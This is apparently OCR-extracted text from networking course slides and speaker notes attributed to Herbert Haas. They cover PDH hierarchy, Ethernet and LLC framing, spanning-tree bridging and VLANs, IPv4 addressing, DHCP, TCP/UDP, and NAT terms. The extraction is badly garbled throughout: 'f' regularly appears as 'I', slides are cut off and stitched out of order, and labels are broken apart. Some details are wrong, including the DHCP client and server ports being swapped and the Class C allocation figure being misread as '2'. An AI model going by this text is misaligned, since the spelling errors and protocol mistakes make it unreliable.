12 {C} Herbert Haas 2005/03/11
Why PIesiochronous?
1960s technoIogy: No buffering of frames
at high speeds possibIe
GoaI: Fast deIivery, very short deIays
(voice!)
Grooming required
Now we know the meaning oI the term "plesiochronous". But what is meant by
the term "hierarchy" in this context? Obviously Telcos were supposed to supply
millions oI users with a dial tone. Which topology would be most eIIicient? Only
star topology can eIIiciently cover whole villages, cities, and even countries. A
star consists oI many point-to-point connections: each spoke is connected to a hub.
The hub is called the "Central OIIice" (CO) and the spokes are either telephones
or multiplexers.
TraIIic always concentrates to the hubs but is also distributed Irom the hubs. The
hubs are interconnected by PDH trunks. Many trunks constitute spokes and are
again concentrated in anotherhigher levelhub. This principle is applied
recursively, Iorming a so-called Digital Hierarchy. II you go deeper into this
hierarchy you will see higher data rates.
The backbone itselI consists oI point-to-point or ring topologies. Rings have the
advantage oI providing one redundant connection between each two nodes.
OI course the number oI links are much lower in the heart oI the hierarchy
(thereIore the data rate is much higher). Hubs are responsible to collect all user
signals that are destined to the same direction and put them onto the same trunk.
This process is called "grooming".
14
14 {C} Herbert Haas 2005/03/11
DigitaI Hierarchy of MuItipIexers
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
E1 = 30 x 64 kbit/s + Overhead
E2 = 4 x 30 x 64 kbit/s + O
E3 = 4 x 4 x 30 x 64 kbit/s + O
E4 = 4 x 4 x 4 x 30
x 64 kbit/s + O
64 kbit/s
ExampIe: European PDH
The picture above shows the digital multiplexing hierarchy used in European PDH
networks. The lowest data rate uses so-called "E1" Irames, consisting oI 30 user
signals. At each multiplexing level Iour lower rate channels can be combined to
one higher rate channel. This way an "E2", "E3", and "E4" is Iormed.
Also higher multiplexing levels had been deIined, Ior example "E5" but they are
not used very oIten.
15
15 {C} Herbert Haas 2005/03/11
DigitaI SignaI LeveIs
Differentiate:
12 T1 frames (DS4)
Increasing overhead
PhysicaI Layer
Section (Regenerator Section) Layer
Consists of 4 x
OC-3c channeIs
Uni-directionaI
routing
2 channeIs
occupied
ADM
2
Drop &
Continue
The picture above illustrates the capabilities oI ADMs.
41
41 {C} Herbert Haas 2005/03/11
Uni- and Bi-directionaI Routing
ADM
2
ADM
3
ADM
1
ADM
4
ADM
2
ADM
3
ADM
1
ADM
4
Uni-directionaI routing Bi-directionaI routing
The picture above illustrates the capabilities oI ADMs together with unidirectional
and bidirectional routing.
42
42 {C} Herbert Haas 2005/03/11
Operations
Protection
SeriaI Line IP
Predecessor of PPP
IP uses "IPCP"
TypicaI tasks
2.94 Mbit/s
Destination
Address
Data
Source
Address
CRC
1 8 8 about 4000 bits 16
OriginaI Ethernet Frame
The Aloha protocol was Iairly simple: send whenever you like, but wait Ior an
acknowledgement. II there is no acknowledgement then a collision is assumed
and the station has to retransmit aIter a random time. "Pure Aloha" achieved a
maximum channel utilization oI 18 percent. "Slotted Aloha" used a centralized
clock and assigned transmission slots to each sender, hereby increasing the
maximum utilization to about 37 percent. Robert MetcalIe perceived the
problem: another backoII algorithm was needed but also "listen beIore talk".
MetcalIe created Carrier Sense Multiple Access Collision Detection
(CSMA/CD) and a truncated exponential backoII algorithm which allows a
100 percent load.
Robert MetcalIe's Iirst Ethernet system used a transmission rate at 2.94 Mbit/s
which was the system clock oI the Xerox Alto workstations at that time.
Originally, in 1972 MetcalIe called his system Alto Aloha Network, but one
year later he renamed it into "Ethernet" in order to emphasize that this
networking system could support any computer not just Altos and oI course
to clariIy the diIIerence to traditional Aloha!
4
4 {C} Herbert Haas 2005/03/11
History (2)
1976: Robert MetcaIfe reIeased the
famous paper:
"Ethernet: Distributed Packet
Switching for LocaI Computer
Networks"
OriginaI sketch
The press has oIten stated that Ethernet was invented on May 22, 1973, when
Robert MetcalIe wrote a memo to his bosses stating the possibilities oI
Ethernet's potential, but MetcalIe claims Ethernet was actually invented very
gradually over a period oI several years. In 1976, Robert MetcalIe and David
Boggs (MetcalIe's assistant) published a paper titled, "Ethernet: Distributed
Packet-Switching For Local Computer Networks."
MetcalIe leIt Xerox in 1979 to promote the use oI personal computers and local
area networks (LANs). He successIully convinced Digital Equipment, Intel,
and Xerox Corporations to work together to promote Ethernet as a standard.
Now an international computer industry standard, Ethernet is the most widely
installed LAN protocol.
5
5 {C} Herbert Haas 2005/03/11
History (2)
1978: Patent for Ethernet-Repeater
1980: DEC, InteI, Xerox (DIX) pubIished
the 10 Mbit/s Ethernet standard
Improvement of ALOHA
Frame is discarded
HDLC heritage
DSAPSSAP Ctr
layer 2 (LLC)
data MAC Header MAC Traer
Basic frame format of every IEEE protocoI
Which is my
destination
Iayer?
Which is my
source
Iayer?
HDLC
functionaIity
The LLC (802.2) is part oI every basic Irame Iormat that is speciIied by the
IEEE e.g. Token ring, Token bus, Ethernet, etc.
The DSAP and SSAP Iield are both eight bit in length and are used to address
layer 3 processes. With the SSAP the layer 2-3 interIace used at the source is
speciIied, while the DSAP speciIies the layer 2-3 interIace at the destination.
But typically it is very unlikely to use a SSAP value diIIerent Irom the DSAP
value, because only layer 3 processes oI the same kind are able to communicate
with each other. So IP to IP communication would use a SSAP and DSAP
value oI 0 x 06.
The Control Iield inside the LLC can be used Ior connection-oriented or
connection-less communication and the way it works is basically the same
what HDLC does.
20
20 {C} Herbert Haas 2005/03/11
LLC DetaiIs
According sophisticated HDLC
functionaIities, 4 LLC cIasses defined
0xAA. SNAP
0xE0. NoveII
0xF0. NetBios
U CtrI
I
G
U
63 IEEE defined
63 vendor defined
DSAP SSAP
63 IEEE defined
63 vendor defined
C
R
User: IEEE or
Vendor
Command or
Response
IndividuaI or
Group
The DSAP and the SSAP are both 8 bit in length. The least signiIicant bit in
the DSAP is reserved to indicate whether it`s a individual or group access
point. In the SSAP this bit is the command/response bit and is not used in
Ethernet systems. The U bit is used to speciIy whether its an IEEE or vendor
speciIic access point.
Hex E0 .......... Novell (U0)
Hex Fy .......... reserved Ior IBM (U0)
Hex F0 .......... Netbios (U0)
Hex F4 .......... IBM LAN manager individual (U0)
Hex F5 .......... IBM LAN manager group (U0, I/G 1)
Hex F8 .......... remote program load (U0)
Hex 04 .......... SNA path control individual (U0)
Hex 05 .......... SNA path control group (U0, I/G 1)
The range Hex 8y to 9C (with U0) is reserved Ior Iree usage except y xx1x (binary notation); U1
Hex 00 ......... Null SAP
A station with running LLC soItware always responds to a Irame destined to the Null SAP a LLC Ping can be
implemented.
Hex 03 ......... LLC sub-layer management (U1)
Hex 06 ......... DoD IP (U1)
Hex 42 ......... 802.1d Spanning Tree Protocol (U1)
Hex AA ......... TCP/IP SNAP (U1)
Hex FE ......... ISO Network Layer (U1)
22
22 {C} Herbert Haas 2005/03/11
DIX Type fieId
2-bytes Type fieId to identify payIoad
(protocoIs carried)
Cat 4
Cat 5
Cat 6
Cat 7
Category depends on twisting cycIes
per Iength unit, isoIation, and shieIding
The cables types used in networking are divided in diIIerent categories which
determine the capability oI a cable e.g. max. Irequency, impedance,
attenuation, crosstalk, etc.
The CAT 3, 4, 5, 5e, 6 are speciIied by the T568-B standard published by the
Electronic Industry Association and Telecommunications Industry Association
(EIA/TIA).
CAT 7 cables are currently not covered by the standard but it is assumed that
they will provide a bandwidth capacity oI up to 400 MHz.
CAT 3... 16 Mhz
CAT 4... 20 MHz
CAT 5... 100 MHz
CAT 5e..... 100 MHZ
CAT 6... 250 MHZ
The Category 5e (CAT5e), or Enhanced Category 5, was ratiIied in 1999. It`s
an incremental improvement designed to enable cabling to support Iull-duplex
Fast Ethernet operation and Gigabit Ethernet.
Like CAT5, CAT5e is a 100-MHz standard, but has stricter speciIications Ior
crosstalk, attenuation and return loss.
27
27 {C} Herbert Haas 2005/03/11
TypicaI NIC Design
Connector
PHY
MDI
AU/M/GM-cable
MAC
PHY
MDI
E.g. 100BaseFX
transceiver
E.g. Fiber MC connector
internal transceiver
Computer /O Bus
RJ45
connector
AUI Attachment Unit Interface
MII Media Independent Interface
GMII Gigabit MII
MDI Medium Dependent Interface
PHY PhysicaI Layer Device
MAC Media Access ControI Unit
In this graphic we Iind a drawing about the principal design oI a network
interIace card.
We Iind the MAC layer directly located on the Ethernet card which is
responsible Ior the interaction between the physical and the Data-link layer.
Then there is a physical interIace directly located at the Ethernet card itselI
equipped with an RJ45 connector.
The AUI/MII/GMII connector represents a bus system Ior 10/100/1000
Ethernet systems used Ior media conversion with the help oI an transceiver.
28
28 {C} Herbert Haas 2005/03/11
Summary
SuccessfuI because simpIe
Two frames: DIX (Ethernet2) and
IEEE (802.3)
Shared medium has consequences
HaIf/fuII-dupIex?
CoIIision behavior?
What is the canonicaI addressing format?
What is a jam signaI?
What is 802.3u and 803.3z ?
What is a runt? What is the opposite?
1
2005/03/11 {C} Herbert Haas
Transparent Bridging
and VLAN
Plug and Play Networking
2
I think that I shall never see
a graph more lovelv than a tree
a graph whose crucial propertv
is loop-free connectivitv.
A tree which must be sure to span
so packets can reach everv lan.
first the root must be selected
bv ID it is elected.
least cost paths to root are traced,
and in the tree these paths are place.
mesh is made bv folks like me,
bridges find a spanning tree.
Algorhyme
Radia PerIman
Radia Perlman, PhD computer science 1988, MIT * MS math 1976, MIT * BA
math 1973, MIT
Radia Perlman specializes in network and security protocols. She is the
inventor oI the spanning tree algorithm used by bridges, and the mechanisms
that make modern link state protocols eIIicient and robust. She is the author oI
two textbooks, and has a PhD Irom MIT in computer science.
Her thesis on routing in the presence oI malicious Iailures remains the most
important work in routing security. She has made contributions in diverse areas
such as, in network security, credentials download, strong password protocols,
analysis and redesign oI IPsec's IKE protocols, PKI models, eIIicient certiIicate
revocation, and distributed authorization. In routing, her contributions include
making link state protocols robust and scalable, simpliIying the IP multicast
model, and routing with policies.
3
3 {C} Herbert Haas 2005/03/11
Bridge History
Bridges came after routers!
First bridge designed by Radia PerIman
Forwarding of frames
Forwarding of packets
MuItipIe ports
Improved functionaIity
Don't confuse it with WAN Switching!
CompIeteIy different !
Broadcast storms
EndIess cycIing
ProtocoI based
ISL (Cisco)
There are diIIerent ways to assign hosts (users) to VLANs. The most common
is the port-based assignment, meaning that each port has been conIigured to be
member oI a VLAN. Simply attach a host there and its user belongs to that
VLAN speciIied.
Hosts can also be assigned to VLANs by their MAC address. Also special
protocols can be assigned to dedicated VLANs, Ior example management
traIIic. Furthermore, some devices allow complex rules to be deIined Ior
VLAN assignment, Ior example a combination oI address, protocol, etc.
OI course VLANs should span over several bridges. This is supported by
special VLAN trunking protocols, which are only used on the trunk between
two switches. Two important protocols are commonly used: the IEEE 802.1q
protocol and the Cisco Inter-Switch Link (ISL) protocol. Both protocols
basically attach a "tag" at each Irame which is sent over the trunk.
30
30 {C} Herbert Haas 2005/03/11
VLAN Trunking ExampIe
Inter-VLAN communication not possibIe
Packets across the VLAN trunk are tagged
Either using 802.1q or ISL tag
Broadcast storms
EndIess cycIing
TCN mechanism
RSTP
MSTP
19
19 {C} Herbert Haas 2005/03/11 http://www.perihel.at
Note: STP is a port-based aIgorithm
OnIy the root-bridge eIection is done
on the bridge-IeveI
AII other processing is port-based
Cisco patent
Few seconds
Better scaIabiIity
DefauIt mode
Instance 0
Frame Bursting
Carrier Extension
No GE-Hubs avaiIabIe on the market
today forget it!
No CSMA/CD defined for 10GE (!)
Remember: Hubs simulate a halI-duplex coaxial cable inside, hence limiting
the total network diameter. For Gigabit Ethernet this limitation would be about
25 meters, which is rather impracticable Ior proIessional usage. Although
some countermeasures had been speciIied in the standard, such as Irame
bursting and carrier extension, no vendor developed an GE hub as Ior today.
Thus: Forget GE Hubs!
The 10 GE speciIication does neither consider copper connections nor hubs. 10
GE can only run over Iiber.
At this point please remember the initial idea in the mid 1970s: Bus,
CSMA/CD, short distances, no network nodes.
Today: Structured cabling (point-to-point or star), never CSMA/CD, WAN
capabilities, sophisticated switching devices in between.
9
9 {C} Herbert Haas 2010/02/15
MAC ControI Frames
AdditionaI functionaIity easiIy integrated
Radiation/EMI
Grounding probIems
High BER
CoIIision free
WAN quaIified
Switched
SeveraI coding styIes CompIex PHY
architecture
PIug & pIay through autonegotiation
Much simpIer than ATM but no BISDN
soIution - might change!
23
23 {C} Herbert Haas 2010/02/15
Quiz
Why tends high-speed Ethernet to
synchronous PHY?
Can I attach a 100 Mbit/s port to a
1000 Mbit/s port via fiber?
What is the idea of EtherchanneIs?
(Maximum bit rate, difference to
muItipIe paraIIeI Iinks)
Q1: On Iiber its diIIicult to deal with asynchronous transmission, photons
cannot be buIIered easily, store and Iorward problems
Q2: No, autonegotiation on Iiber does not care Ior data rates
Q3: "normal" parallel links would be disabled by STP, Etherchannel supports
up to 8 links
1
2005/03/11 {C} Herbert Haas
The Internet ProtocoI (IP)
The Blood of the nternet
2
"Information Superhighway is really an
acronym for 'Interactive Network For
Organizing, Retrieving, Manipulating,
Accessing And 1ransferring Information
On National Systems, Unleashing Practically
Every Rebellious Human
Intelligence, Cratifying Hackers, Wiseacres,
And Yahoos'."
Keven Kwaku
3
3 {C} Herbert Haas 2005/03/11
The Internet ProtocoI (IP)
Introduction
IP Addressing
IP Header
IP Address Format
Address CIasses
CIass A - E
Subnetting, VLSM
IP Fragmentation
In this chapter we talk about the Internet Protocol (IP), especially about IP
Version 4. IPv4 was standardized in September 1981 in RFC 791.
IP is a packet-switching technology on OSI layer 3. IP is connectionless and an
overlay technique. In this module we discuss Iundamental questions around the IP
protocol, such as: What other (helper) protocols are necessary ? What is an IP-
Address ? What is Subnetting and VLSM ?
4
4 {C} Herbert Haas 2005/03/11
Need of an Inter-Net ProtocoI (1)
Different Data-Link Layer
Different frames
Different protocoI
handIing
Different PhysicaI Layer
Different hardware
Different signaIs
No interconnection
possibIe !!!
Host 1
Host 2
Host 3
Host 1
Host 2
Host 3
Host 1
Host 3 Host 2
Why do we need an Inter-Net Protocol? DiIIerent networks have diIIerent Data-
Link Layer. Every Network runs a diIIerent protocol. Some networks use
proprietary link layer protocols or X.25, other networks have Ethernet or HDLC.
You see, every network has its own hardware, signals and Irames. As long as they
do not want to communicate with each other, there is no problem...
5
5 {C} Herbert Haas 2005/03/11
Need of an Inter-Net ProtocoI (2)
Network 1
Network 3
Network 2
Common internetworking Iayer
ConnectionIess
Layer 4
The End-to-end control is implemented in the upper Layers oI the IP host, by
TCP (Transmission Control Protocol - Layer 4 Protocol).
TCP is a connection oriented protocol. It takes care about Ilow-control,
sequencing, windowing and error recovery.
9
9 {C} Herbert Haas 2005/03/11
IP Introduction (4)
IP over anything: OverIay Technique
Connection oriented
Error recovery
FIow controI
Sequencing
IP is the router's Ianguage
A (1-127)
B (128-191)
C (192-223)
D (224-239, MuIticast)
E (240-254, ExperimentaI)
CIasses define number of address-
bits for net-id
In the beginning oI the Internet, Iive address classes had been deIined. Classes A,
B, and C had been created to provide diIIerent network addresses ranges.
Additionally Class D is the range oI IP multicast addresses, that is they have no
topological structure. Finally, class E had been reserved Ior research experiments
and are not used in the Internet.
The idea oI classes helps a router to decide how many bits oI a given IP address
identiIy a network number and how many bits are thereIore available Ior host
numbering. The usage oI classes has a long tradition in the Internet and was a
main reason Ior IP address depletion.
The first byte (or "octet") oI an IP address identiIies the class. For example the
address 205.176.253.5 is a class C address.
17
17 {C} Herbert Haas 2005/03/11
Broadcasts and Networks
AII ones in the host-part represents
,network-broadcast"
(10.255.255.255)
AII ones in the net-part and host-
part represents ,Iimited broadcast
in this network" (255.255.255.255)
AII zeros in the host-part represents
the ,network-address" (10.0.0.0)
A network broadcast is used to send a broadcast packet to a dedicated network.
The IETF strongly discourages the use oI network broadcast and it is not deIined
Ior IPv6.
II a destination IP address consists oI "all 1", which can be represented by
decimal numbers as "255.255.255.255", then this is recognized as "local" or
"limited" broadcast. A limited broadcast is never Iorwarded by routers, otherwise
the whole Internet would be congested by "broadcast storms". Note that
broadcast addresses must not be used Ior source addresses.
A network is described using the "network address", which is simply its IP
address with host part set to zero. Network addresses are used in routing entries
and routing protocols, since a router only deals with networks and doesn't care Ior
host addresses.
18
18 {C} Herbert Haas 2005/03/11
Reserved Addresses
Address range for private use
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
RFC 1918
Network 127.x.x.x is reserved for
"Loopback"
So-called RFC 1918 addresses are class A, B, and C address blocks which can
be used Ior internal purposes. Such addresses must not be used in the Internet.
All gateways connected to the Internet should Iilter packets that contain these
private addresses. Furthermore these addresses must not be used in Internet
routing updates.
Because oI those rigid Iilter policies, it is relatively saIe to utilize RFC 1918
addresses in local networkseverybody in the Internet knows which addresses
must be Iiltered.
Each operating system provides a virtual IP interface, called the loopback
interface. Per deIault the IP addresses 127.x.x.x are reserved Ior this reason.
Initially, the idea came Irom the UNIX world as IP is only one oI several means
to achieve inter-process communication upon a UNIX workstation. Other
methods are named/unnamed pipes, shared memories, or message queues Ior
example.
When using IP Ior inter-process-communication, the involved client/server
processes can be distributed upon diIIerent servers across a networkwithout
any modiIication oI the source codes!
By deIault, a modern operating system assigns the IP address 127.0.0.1 to the
local loopback interIace.
19
19 {C} Herbert Haas 2005/03/11
Addressing ExampIe
E0
E0 E0 E0
E1
S0
S0 S0
S1
S1
S1
10.0.0.0
172.16.0.0
172.20.0.0
192.168.1.0
10.0.0.1 10.0.0.2
172.16.0.1 172.16.0.2 192.168.1.1 192.168.1.2 192.168.1.3
172.20.0.1 172.20.0.2
10.0.0.254
172.20.0.254
192.168.1.254 192.168.1.253 172.16.0.2
192.168.2.1
192.168.2.2
192.168.4.1
192.168.3.1
192.168.3.2
192.168.4.2
192.168.3.0
192.168.2.0
192.168.4.0
22
22 {C} Herbert Haas 2005/03/11
CIassfuI Address Waste
Two-IeveI hierarchy was sufficient in the earIy days of the
Internet
The growing sizes of LANs demanded for a third
hierarchicaI IeveI
"Subnetting" aIIows to identify some bits of the host-ID to
be interpreted as "Subnet"
CIass A
CIass B
CIass C
126 48 54%
16383 7006 43%
2097151 40724 2%
TotaI AIIocated AIIocated %
Network Number Statistics, ApriI 1992 (Source: RFC 1335)
The "classful" method oI identiIying network-IDs oI a given IP address is
inIlexible and lead to address space depletion. The table above shows how the
total address space had been allocated by April 1992, according to RFC 1335.
Note that only 2 oI more than 2 million Class C addresses had been assigned.
Class C networks are too small Ior most organizations but class A and B are too
large. OI course many companies tried to grab a class A network number because
oI the huge address spacethey would never need another IP network number
anymore.
LANs were getting bigger and bigger and a logical separation oI an organization's
network (e. g. oI a class A network number) would be a great help. Until now,
multiple network numbers had been assigned to single companies, which caused
two problems: waste oI IP address space and growing Internet routing tables.
Even in 1985, RFC 950 deIined a standard procedure to support subnetting oI a
single Class A, B or C network number into smaller pieces. Now organizations
can deploy additional subnets without needing to obtain a new network number
Irom the Internet.
24
24 {C} Herbert Haas 2005/03/11
Subnet Zero / Subnet Broadcast
Consider network 10.0.0.0
CIasses A, B, C
IP Routing Basics
BOOTP
DHCP
28 {C} Herbert Haas 2005/03/11
Proxy ARP
2005/03/11 28 Address Resolution {ARP, RARP, Proxy ARP}
"The ARP Hack"
29 {C} Herbert Haas 2005/03/11
Proxy ARP (1)
Router connect onIy networks with
different net-IDs
Router with Proxy ARP enabIed aIso
connect networks with same Net-ID
ImpIementation differences!
38 {C} Herbert Haas 2005/03/11
SimpIe Operation
Any station (host or router) detecting
transmission probIems sends ICMP
error message back to the originator
ICMP gives feedback
ICMP messages are carried within IP
packets
ProtocoI fieId = 1
C
M
P
m
e
s
s
a
g
e
t
o
1
.
0
.
0
.
1
"
h
o
s
t
u
n
r
e
a
c
h
a
b
le
"
53 {C} Herbert Haas 2005/03/11
RuIes
The interface on which the packet comes
into the router is the same interface on
which the packet gets routed out
The subnet/network of the source IP
address is the same subnet/network of the
next-hop IP address of the routed packet
The datagram is not source-routed
The kerneI is configured to send redirects
54 {C} Herbert Haas 2005/03/11
Summary
On Layer 3, IP-Addresses are used to route
packets
Message Type
Hardware Address Type (HTYPE)
Hardware Address Length (HLEN)
Hops
Increased/checked by routers
The Hops Iield is important to avoid broadcast loops in a network. Every time a
BOOTP packet is checked by a router, the router increase the hops Iield per 1.
Operation Code (OP)
1. Boot request
2. Boot reply
Hardware Address Type (HTYPE)
Network Type (1. Ethernet 10MBit)
Hardware Address Length (HLEN)
6. Ethernet
10
10 {C} Herbert Haas 2005/03/11
BootP - Message FieIds
Transaction ID
MAC-address of cIient
The "Server-IP-address" contains the IP address oI an optional boot server.
II a gateway does decide to Iorward the request, it should look at the 'giaddr'
(gateway IP address) Iield. II zero, it should plug its own IP address (on the
receiving cable) into this Iield. It may also use the 'hops' Iield to optionally
control how Iar the packet is reIorwarded. Hops should be incremented on each
Iorwarding. For example, iI hops passes '3', the packet should probably be
discarded.
The Client's HW address is needed to Iind an entry in the address-table at the
BOOTP server.
12
12 {C} Herbert Haas 2005/03/11
BootP - Message FieIds
Server Host Name
More parameters
Uses UDP communication
CIient-Side: Port 67
Server-Side: Port 68
Based on a Ieasing idea!
Dynamic configuration
RFC 2131 and RFC 2132
The Dynamic Host ConIiguration Protocol works nearly identical to BOOTP.
DHCP uses the same message Iormat with only slightly chances.
DCHP based on a leasing idea. The IP address will be leased Irom the server to
the client Ior a special time, aIter this time expired the client need to send his
request again.
15
15 {C} Herbert Haas 2005/03/11
FIexibIe Configurations
Automatic: Host gets permanent
address
Dynamic: Address has expiration
date/time (Ieasing) !
ManuaI: Fixed mapping MAC IP
In the slide above you see the three diIIerent kind oI conIiguration methods.
BOOTP uses a manual conIiguration, a Iixed mapping (MAC -~ IP). DHCP has
a dynamic conIiguration. The oIIered IP address Irom the server will be expire
aIter a special time (leasing idea).
16
16 {C} Herbert Haas 2005/03/11
Parameters
IP address
Subnet mask
DNS Server
NetBIOS Name Server
List of defauIt gateways
Ethernet EncapsuIation
Router Discovery (RFC 1256)
Path MTU Discovery (RFC 1191)
etc...
In this slide you see some conIiguration parameters which can send with DCHP.
It is also possible to transIer inIo about the maximal Iragment size, ARP cache
timeout, TCP keepalive, deIault TTL, source routing options and MTU.
17
17 {C} Herbert Haas 2005/03/11
How Does It Work - 1
Here is MAC A.
I need an IP
Address !
IP LEASE REQUEST
[DHCPDISCOVER]
DHCP CIient
DHCP Server 2
IP LEASE OFFER
[DHCPOFFER]
1.
2.
DHCP Server 1
In the slide above you see the basic principle oI DHCP. It is possible in a bigger
network that there are not only one DHCP server. The DHCP client connect to
the network at starts sending out a IP LEASE REQUEST |DHCPDISCOVER|
(via broadcast, like BOOTP). Every DHCP server in the network receives this
message. Every DHCP server has a own address pool. II one server has addresses
leIt in this pool, he sends back an IP LEASE OFFER |DHCPOFFER| (in this
oIIer there is the IP address Ior the client) to the client.
18
18 {C} Herbert Haas 2005/03/11
10.1.0.99
How Does It Work - 1
Source IP Address: 0.0.0.0
Dest. IP Address: 255.255.255.255
HW Address: MAC A
DHCPDISCOVER
Source IP Address: 10.1.0.20
Dest. IP Address: 255.255.255.255
Offered IP Address: 10.1.0.99
CIient HW Address: MAC A
Subnetmask: 255.255.255.0
LeaseIength: 48h
Server ID: 10.1.0.20
DHCPOFFER
10.1.0.20
1.
2.
10.1.0.10
DETAILED
This picture shows the same as the last one, but more detailed. The client sends
out his DHCPDISCOVER message and both servers receive it. Then server
10.1.0.20 sends back his DHCPOFFER. In this oIIer there are the IP address Ior
the client (OIIered IP Address), subnet mask, server ID and also the lease length.
19
19 {C} Herbert Haas 2005/03/11
How Does It Work - 2
IP LEASE ACKNOWLEGMENT
[DHCPACK]
DHCP CIient
DHCP Server 1
DHCP Server 2
IP LEASE SELECTION
[DHCPREQUEST]
3.
4.
Thank you server
2 for the IP
Address! Listen
everybody: I use
the information
from this server,
stop to offer!
AIter the client gets an oIIer Irom one server, he sends out an IP LEASE
SELECTION |DHCPREQUEST| to tell the other server that he will accept the
oIIer Irom server 2 and that the other servers can stop sending him oIIers. The
DHCPREQUEST is also a broadcast.
20
20 {C} Herbert Haas 2005/03/11
How Does It Work - 2
Source IP Address: 0.0.0.0
Dest. IP Address: 255.255.255.255
HW Address: MAC A
Req. IP Address: 10.1.0.99
Server ID: 10.1.0.20
DHCPREQUEST
Source IP Address: 10.1.0.20
Dest. IP Address: 255.255.255.255
Offered IP Address: 10.1.0.99
CIient HW Address: MAC A
Subnetmask: 255.255.255.0
LeaseIength: 48h
Server ID: 10.1.0.20
DHCPACK
10.1.0.99
10.1.0.20
10.1.0.10
3.
4.
DETAILED
One important thing is the server ID in the DHCPREQUEST. This server ID tells
the server Irom which the client gets his IP address that the client will take this
oIIered address. AIter server 2 receipt the DHCPREQUEST he sends back the
DHCPACK to acknowledgment this lease.
21
21 {C} Herbert Haas 2005/03/11
Bound
DHCPACK (success) is send by the
server who's offer was accepted
CIient receives the DHCPACK
CIient enters the BOUND state
TCP/IP is compIeteIy initiaIized
AIter the client receipt the DHCPACK (iI all was successIul) the client enters the
BOUND state. AIter the client is BOUND TCP/IP complete initialized and the
client is ready Ior data transIer.
22
22 {C} Herbert Haas 2005/03/11
DHCPNACK
DHCPNACK (no success) wiII be
send if
Response to a DHCPDISCOVER
Offering an IP address
DHCPREQUEST
Lease Time
T1 (renewaI attempt)
FIow controI
RFC 793
In this Chapter we talk about TCP. TCP is a connection-oriented layer 4 protocol
and only works between the hosts. It synchronizes (connects) the hosts with each
other via the '3-Way-Handshake beIore the real transmission begins. AIter this
a reliable end-to-end transmission is established. TCP was standardized in
September 1981 in RFC 793. (Remember: IP was standardized in September
1981 too, RFC 791). TCP is always used with IP and it also protects the IP
packet as its checksum spans over (almost) the whole IP packet.
TCP provides error recovery, Ilow control and sequencing. The most important
thing with TCP is the Port-Number, we will discus later.
3
3 {C} Herbert Haas 2005/03/11
TCP Facts (2)
AppIication's data is regarded as
continuous byte stream
TCP ensures a reIiabIe transmission
of segments of this byte stream
Handover to Layer 7 at "Ports"
ControIIed by IANA
CIient processes use arbitrary port
numbers >1023
1433 Microsoft-SQL-Server
1527 OracIe
MuItipIe of 4 bytes
Often ignored
PSH-Flag: 1 Bit. Control Bit.
A TCP instance can decide on its own, when to send data to the next instance.
One strategy could be, to collect data in a buIIer and Iorward the data when the
buIIer exceeds a certain size. To provide a low-latency connection sometimes the
PSH Flag is set to 1. Then TCP should push the segment immediately to the
application without buIIing. But typically the PSH-Flag is ignored.
15
15 {C} Herbert Haas 2005/03/11
TCP Header (5)
SYN-FIag
"DeIayed AcknowIedgements"
....
AdditionaIIy, there are different impIementations
(Reno, Vegas, .)
'Slow Start and 'Congestion avoidance are mechanisms that control the
segment rate (per RTT).
'Fast Retransmit and 'Fast Recovery are mechanisms to avoid waiting Ior the
timeout in case oI retransmission and to avoid slow start aIter a Iast
retransmission.
Delayed Acknowledgements is typically used with applications like Telnet: Here
each client-keystroke triggers a single packet with one byte payload and the server
must response with both an echo plus a TCP acknowledgement. Note that also
this server-echo must be acknowledged by the client. ThereIore, layer-4 delays
the acknowledgements because perhaps layer-7 might want to send some bytes
also.
The Nagle algorithm tries to make WAN connections more eIIicient. We simply
delay the segment transmission in order to collect more bytes Irom layer-7.
Selective Acks enhance the traditional positive-ack-mechanism and allows to
selectively acknowledge some correctly received segments within a larger
corrupted block.
Window Scaling deals with the problem oI a jumping window in case the RTT-
BW-product is greater than 65535 (the classical max window size). This TCP
option allows to leIt-shiIt the window value (each bit-shiIt is like multiply by
two).
31
31 {C} Herbert Haas 2005/03/11
TCP Disconnect
A TCP session is disconnected simiIar
to the three way handshake
The FIN fIag marks the sequence number to be
the Iast one; the other station acknowIedges and
terminates the connection in this direction
The exchange of FIN and ACK fIags ensures, that
both parties have received aII octets
The RST fIag can be used if an error occurs
during the disconnect phase
32
32 {C} Herbert Haas 2005/03/11
UDP
UDP is a connectionIess Iayer 4 service
(datagram service)
Layer 3 Functions are extended by port
addressing and a checksum to ensure integrity
UDP uses the same port numbers as TCP
(if appIicabIe)
UDP is used, where the overhead of a connection
oriented service is undesirabIe or where the
impIementation has to be smaII
DNS request/repIy, SNMP get/set, booting by TFTP
Less compIex than TCP, easier to impIement
UDP is connectionless and supports no error recovery or Ilow control. ThereIore
an UDP-stack is extremely lightweight compared to TCP.
Typically applications that do not require error recovery but rely on speed use
UDP, such as multimedia protocols.
33
33 {C} Herbert Haas 2005/03/11
UDP Header
Destination Port Number Source Port Number
PAYLOAD
0 4 8 12 16 20 24 28 32
UDP Length UDP Checksum
The picture above shows the 8 byte UDP header. Note that the Checksum is oIten
not calculated, so UDP basically carries only the port numbers.
I personally think that the length Iield is just Ior Iun (or to align with 4 octets).
34
34 {C} Herbert Haas 2005/03/11
UDP
Source and Destination Port
RefIects origin
Since these terms are so important and many people and some documents
conIuse them, we give a summary here.
Note that local addresses have local meaning. That is: inside devices can only
deal with packets having local addresses. The NAT router is responsible to
translate global addresses to local and vice versa if necessarv ! (II you later
understand the last two italic-written words, then you got it.)
Note that outside does not mean another (Ioreign) NAT-domain. Outside
means simply the Internet or everything beyond the NAT-router.
8
8 {C} Herbert Haas 2005/03/11
Terms Summary
Inside Network
Outside Network
NAT
Inside Local
Outside Local DA
SA Inside Global
Outside Global DA
SA
Outside Global
Inside Global DA
SA Outside Local
Inside Local DA
SA
This slide summarizes all terms by showing packets Ilowing Irom inside to
outside and Irom outside to inside. Local is what we can use inside our
network. Inside local source addresses are always private addresses otherwise
we won't use NAT.
Outside local addresses can be either private or registered. Mostly they are
registered, but in certain cases we might want to present oIIicial registered
addresses in incoming packets as being private addresses. See the slide
"Outside Address Translation" Ior this special case. Typically the outside local
address is mostly identical with the outside global address.
The inside global address is the oIIicial address oI our hosts as seen in the
Internet. What people mostly expect Irom NAT is to translate an inside local
address to an inside global address. Both addresses belong to a host inside our
network.
The outside global address is the oIIicial registered IP address oI an Internet
host. Mostly it is identical with our outside local address we use as destination
address Ior outgoing packets. See the slide "Outside Address Translation" Ior
exceptions.
9
9 {C} Herbert Haas 2005/03/11
Basic PrincipIe (1a)
